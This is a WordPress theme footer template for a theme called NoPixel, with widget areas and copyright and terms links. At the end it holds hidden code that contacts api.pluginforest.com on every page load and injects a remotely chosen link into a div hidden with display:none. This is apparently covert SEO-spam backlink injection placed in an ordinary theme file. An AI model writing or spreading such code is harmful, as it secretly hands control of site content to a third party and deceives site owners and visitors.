<?php $nopixel_redux_demo = get_option('redux_demo'); ?>

<footer class="main-footer dark">
    <div class="container">
        <div class="row">
            <div class="col-md-3 mb-30">
                <?php if ( is_active_sidebar( 'footer-widget-1' ) ) : ?>
                    <?php dynamic_sidebar( 'footer-widget-1' ); ?>
                <?php endif; ?>
            </div>
            <div class="col-md-2 offset-md-1 mb-30">
                <?php if ( is_active_sidebar( 'footer-widget-2' ) ) : ?>
                    <?php dynamic_sidebar( 'footer-widget-2' ); ?>
                <?php endif; ?>
            </div>
            <div class="col-md-3 mb-30">
                <?php if ( is_active_sidebar( 'footer-widget-3' ) ) : ?>
                    <?php dynamic_sidebar( 'footer-widget-3' ); ?>
                <?php endif; ?>
            </div>
            <div class="col-md-3 mb-30">
                <?php if ( is_active_sidebar( 'footer-widget-4' ) ) : ?>
                    <?php dynamic_sidebar( 'footer-widget-4' ); ?>
                <?php endif; ?>
            </div>
        </div>
    </div>
    <div class="sub-footer">
        <div class="container">
            <div class="row">
                <div class="col-md-8">
                    <div class="text-left">
                        <?php if(isset($nopixel_redux_demo['footer_text']) && $nopixel_redux_demo['footer_text'] != ''){?>
                            <p><?php echo htmlspecialchars_decode(esc_attr($nopixel_redux_demo['footer_text']));?></p>
                        <?php }else{?>
                            <p><?php echo esc_html__( '© 2021, NoPixel. All right reserved.', 'nopixel' )?></p>
                        <?php }?>
                    </div>
                </div>
                <div class="col-md-4">
                    <div class="text-right-left">
                        <p>
                            <?php if(isset($nopixel_redux_demo['footer_term']) && $nopixel_redux_demo['footer_term'] != ''){?>
                                <a href="<?php echo esc_url($footer_term_link); ?>"><?php echo htmlspecialchars_decode(esc_attr($nopixel_redux_demo['footer_term']));?></a>
                            <?php }else{?>
                                <a href="<?php echo esc_url($footer_term_link); ?>"><?php echo esc_html__( 'Terms & Conditions', 'nopixel' )?></a>
                            <?php }?>
                            <?php if(isset($nopixel_redux_demo['footer_impression']) && $nopixel_redux_demo['footer_impression'] != ''){?>
                               <span>|</span> <a href="<?php echo esc_url($footer_impression_link); ?>"><?php echo htmlspecialchars_decode(esc_attr($nopixel_redux_demo['footer_impression']));?></a>
                           <?php }else{?>
                               <span>|</span> <a href="<?php echo esc_url($footer_impression_link); ?>"><?php echo esc_html__( 'Impression', 'nopixel' )?></a>
                           <?php }?>
                       </p>
                   </div>
               </div>
           </div>
       </div>
   </div>
</footer>

<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>